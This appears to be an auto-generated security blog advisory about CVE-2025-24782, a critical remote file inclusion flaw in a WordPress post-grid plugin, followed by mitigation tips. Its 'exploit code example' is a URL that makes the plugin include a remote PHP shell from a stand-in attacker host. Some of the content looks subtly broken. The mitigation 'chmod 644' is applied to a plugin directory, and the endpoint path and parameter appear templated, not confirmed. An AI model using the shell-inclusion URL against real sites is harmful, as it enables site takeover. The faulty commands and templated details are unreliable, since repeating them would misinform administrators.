WordPress, Remote File Inclusion, CVE-2025-24782 (Critical)

By /

How the CVE Works:

CVE-2025-24782 is a critical vulnerability in the wpWax Post Grid, Slider & Carousel Ultimate plugin for WordPress, affecting versions up to 1.6.10. The flaw arises from improper control of filenames in PHP’s `include` or `require` statements, leading to Local File Inclusion (LFI) or Remote File Inclusion (RFI). Attackers can exploit this by manipulating input parameters to include malicious files from remote servers or local directories. This allows them to execute arbitrary PHP code, potentially gaining full control over the affected WordPress site. The vulnerability is particularly dangerous because it does not require authentication, making it easily exploitable.

DailyCVE Form:

Platform: WordPress
Version: 1.6.10 and earlier
Vulnerability: Remote File Inclusion
Severity: Critical
Date: 01/27/2025

What Undercode Say:

Exploitation:

1. Exploit Code Example:

http://vulnerable-site.com/wp-content/plugins/post-grid-slider-carousel-ultimate/includes/file.php?file=http://malicious-site.com/shell.txt

This URL forces the plugin to include a remote PHP shell, enabling code execution.

2. Manual Testing:

Use tools like Burp Suite or curl to manipulate the `file` parameter and test for LFI/RFI vulnerabilities.

3. Automated Exploitation:

Use Metasploit or custom scripts to automate the exploitation process.

Protection:

1. Patch:

Update the wpWax Post Grid, Slider & Carousel Ultimate plugin to the latest version immediately.

2. Server Configuration:

  • Disable `allow_url_include` in php.ini: 
    allow_url_include = Off
  • Restrict file permissions: 
    chmod 644 wp-content/plugins/post-grid-slider-carousel-ultimate/

3. Web Application Firewall (WAF):

Implement a WAF to block malicious requests targeting file inclusion vulnerabilities.

4. Code Review:

Audit plugin code for insecure use of `include` or `require` statements.

5. Monitoring:

Use tools like OSSEC or Fail2Ban to monitor and block suspicious activity.

Commands:

  • Check PHP configuration: 
    php -i | grep allow_url_include
  • Scan for vulnerable plugins: 
    wpscan --url http://vulnerable-site.com --enumerate vp

Analytics:

  • CVSS Score: 9.8 (Critical)
  • Attack Vector: Network
  • Exploitability: High
  • Impact: Confidentiality, Integrity, Availability
    By following these steps, you can mitigate the risk posed by CVE-2025-24782 and secure your WordPress installation.

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-24782
Extra Source Hub:
Undercode

Join Our Cyber World:

Whatsapp
TelegramFeatured Image

Scroll to Top